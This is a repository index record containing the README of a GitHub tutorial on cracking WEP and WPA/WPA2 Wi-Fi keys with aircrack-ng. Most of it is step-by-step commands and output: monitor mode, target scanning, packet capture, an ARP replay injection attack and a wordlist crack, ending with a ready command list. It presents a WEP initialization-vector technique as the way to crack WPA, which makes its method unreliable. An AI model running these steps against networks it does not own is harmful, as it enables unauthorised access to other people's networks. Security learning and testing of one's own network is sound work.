{"id":13908725,"url":"https://github.com/david-palma/wifi-cracking","last_synced_at":"2026-01-31T13:10:40.555Z","repository":{"id":169979369,"uuid":"191064152","full_name":"david-palma/wifi-cracking","owner":"david-palma","description":"A guide to using the Aircrack-ng suite for cracking 802.11 WEP and WPA/WPA2-PSK keys, including techniques like packet sniffing and injection attacks to test Wi-Fi network security.","archived":false,"fork":false,"pushed_at":"2023-05-27T08:18:43.000Z","size":8,"stargazers_count":54,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-01-31T16:30:52.372Z","etag":null,"topics":["aircrack-ng","education","hack","hacking","infosec","injection-attacks","packet-sniffing","practice","security","tutorial","wep","wifi","wifi-cracking","wireless-security","wpa","wpa2","wpa2-psk"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/david-palma.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-06-09T23:05:31.000Z","updated_at":"2025-01-23T15:58:02.000Z","dependencies_parsed_at":null,"dependency_job_id":"44507bee-d530-4047-8933-58d5da8a6e4a","html_url":"https://github.com/david-palma/wifi-cracking","commit_stats":null,"previous_names":["david-palma/wifi-cracking"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/david-palma%2Fwifi-cracking","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/david-palma%2Fwifi-cracking/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/david-palma%2Fwifi-cracking/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/david-palma%2Fwifi-cracking/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/david-palma","download_url":"https://codeload.github.com/david-palma/wifi-cracking/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245678902,"owners_count":20654738,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aircrack-ng","education","hack","hacking","infosec","injection-attacks","packet-sniffing","practice","security","tutorial","wep","wifi","wifi-cracking","wireless-security","wpa","wpa2","wpa2-psk"],"created_at":"2024-08-06T23:02:56.655Z","updated_at":"2026-01-31T13:10:35.524Z","avatar_url":"https://github.com/david-palma.png","language":null,"funding_links":[],"categories":["HarmonyOS"],"sub_categories":["Windows Manager"],"readme":"# Wi-Fi cracking with aircrack-ng\n\n[Aircrack-ng](https://aircrack-ng.org/) is basically a network software suite that has been crafted to achieve the following objectives:\n\n* packet sniffing\n* attacking (replay attacks, deauthentication, fake access points...) via packet injection\n* testing Wi-Fi cards and driver capabilities (capture and injection)\n* cracking WEP and WPA/WPA2 Wi-Fi routers\n\nNote that the present tutorial is not an exhaustive guide, rather it is intended to build some basic skills to test your own network's security and get familiar with the concepts.\n\nThe attack outlined below is based on a passive technique (ARP request replay attack) and it focuses on debian-based distributions assuming you have a working wireless card with drivers already patched for injection.\n\n## Aircrack-ng installation\n\nAircrack-ng can be installed on a debian-based operating system by compiling the source code (for more details you can visit the [official website](https://aircrack-ng.org/)).\n\n### Installing required and optional dependencies\n\nBelow you can find instructions for installing the basic requirements to build aircrack-ng for Debian-based operating systems.\n\n```ShellSession\n$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils\n```\n\nGet the latest copy of aircrack-ng:\n\n```ShellSession\n$ git clone https://github.com/aircrack-ng/aircrack-ng\n$ cd aircrack-ng\n```\n\n### Compiling and installing\n\nTo build aircrack-ng, the Autotools build system is used.\nFirst, `./configure` the project for building with the appropriate options:\n\n```ShellSession\n$ autoreconf -i\n$ ./configure --with-experimental\n```\n\nNext, compile the project with the `make` command and use the \"installing\" target from the additional targets listed below to complete the installation.\n\n* Execute all unit testing: `make check`\n* Execute all integration testing (requires root): `make integration`\n* Installing: `make install`\n* Uninstall: `make uninstall`\n\n## Test wireless device packet injection\n\nThe purpose of this step ensures that your card successfully supports injection.\nAssuming your interface name is \"wlan0\" (you can retrieve it typing `iwconfig` on the terminal), type the following command:\n\n```ShellSession\n# aireplay-ng --test wlan0\n```\n\nThe system responds:\n\n```ShellSession\n18:10:59 wlan0 channel: 10\n18:10:59 Trying broadcast probe requests...\n18:10:59 Injection is working!\n18:11:00 Found 1 AP\n...\n```\n\nThis confirms your card can inject packets.\n\n## Simple sniffing and cracking\n\n### 1. Start the wireless interface in monitor mode\n\nThe first thing to do is looking out for a potential target putting your wireless card into monitor mode using `airmon-ng`. However, it is strongly recommended to `kill` all interfering processes prior to using the aircrack-ng suite.\n\n```ShellSession\n# airmon-ng check kill\nKilling these processes:\n\n PID Name\n 870 dhclient\n 1115 wpa_supplicant\n```\n\nThen, it is possible to enable the monitor mode used to create another interface (mon0):\n\n```ShellSession\n# airmon-ng start wlan0\n\nPHY Interface Driver Chipset\n\nphy0 wlan0 ath9k Qualcomm Atheros AR9485\n (monitor mode enabled for [phy0]wlan0 on [phy0]mon0)\n```\n\nYou will notice that \"wlan0\" has successfully been put into monitor mode.\nThen, start `airodump-ng` to look out for networks:\n\n```ShellSession\n# airodump-ng mon0\n```\n\nLocate the wireless network you want to crack, and note its BSSID and channel from the following output:\n\n```ShellSession\nCH 10 ][ Elapsed: 36 s][2019-05-15 18:15\nBSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID\n08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router\n...\n```\n\nNote that the top part of the output lists information about APs in range, and the bottom part lists clients connected to the corresponding APs.\n\n### 2. Start airodump-ng to capture the initial vectors\n\nOpen another console session to capture the initial vectors generated by the target and to save the result into a file:\n\n```ShellSession\n# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0\n```\n\nwhere `-c 10` is the channel for the wireless network, `--bssid 08:00:BF:E6:31:2E` is the MAC address of the AP, `-w output-file` defines the output files that will contain the initialization vectors, and `mon0` is the interface name.\n\nThe system responds:\n\n```ShellSession\nCH 10 ][ Elapsed: 12 s][2019-05-15 18:16\nBSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID\n08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router\n\nBSSID STATION PWR Lost Packets Probes\n08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782\n```\n\nAfter the execution of the command various files will be generated.\n\n### 3. Start aireplay-ng in ARP request replay mode\n\nThe classic ARP request replay attack is the most effective way to generate new initialization vectors, and works very reliably. The purpose of this step is to start `aireplay-ng` in a mode which listens for ARP requests then reinjects them back to the access point.\nKeep your `airodump-ng` and `aireplay-ng` running, open another terminal and run the ARP request replay attack:\n\n```ShellSession\n# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0\n\nSaving ARP requests in replay_arp-0321-191525.cap\nYou should also start airodump-ng to capture replies.\nRead 618643 packets (got 304896 ARP requests), sent 194947 packets...\n```\n\nYou can check if the packets are injected by looking at the `airodump-ng` screen.\n\n### Run aircrack-ng to obtain the WPA key\n\nAt this point, you should be able to obtain the WPA key from the initialization vectors gathered in the previous steps. To perform this attack you need a wordlist and if the network password is not in the wordfile you will not crack the password. Note that most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the [WPA-length password lists](https://github.com/david-palma/wordlists#passwords-with-wpa-length).\n\nOpen another console session and type:\n\n```ShellSession\n# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap\n```\n\nwhere `-a2` specifies the attack mode for WPA/WPA2-PSK, `-w wordlist.txt` refers to your own dictionary wordlist, and `output*.cap` selects all output files with `.cap` extension.\n\nThis is the output of a successful attack:\n\n```ShellSession\n Aircrack-ng 1.5.2\n[00:00:00] 192/1229 keys tested (520.04 k/s)\n\nTime left: 0 seconds 15.62%\n\n KEY FOUND! [ notsecure ]\n\nMaster Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA\n 06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63\n\nTransient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3\n 86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E\n 4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A\n 90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A\n\nEAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68\n```\n\n## List of commands\n\nBelow you can find the list of all of the commands needed to crack a WPA/WPA2 network.\n\n```\n# kill all interfering processes prior to using the aircrack-ng\nairmon-ng check kill\n\n# put your network device into monitor mode\nairmon-ng start wlan0\n\n# listen for all nearby beacon frames to get target BSSID and channel\nairodump-ng mon0\n\n# start listening for the handshake on a new console session\nairodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0\n\n# start the ARP request replay attack\naireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0\n\n# run aircrack-ng to obtain the WPA key\naircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap\n```\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n\n## Disclaimer\n\nThis tutorial has been made for educational purposes only, I don't promote malicious practices and I will not be responsible for any illegal activities.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdavid-palma%2Fwifi-cracking","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdavid-palma%2Fwifi-cracking","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdavid-palma%2Fwifi-cracking/lists"}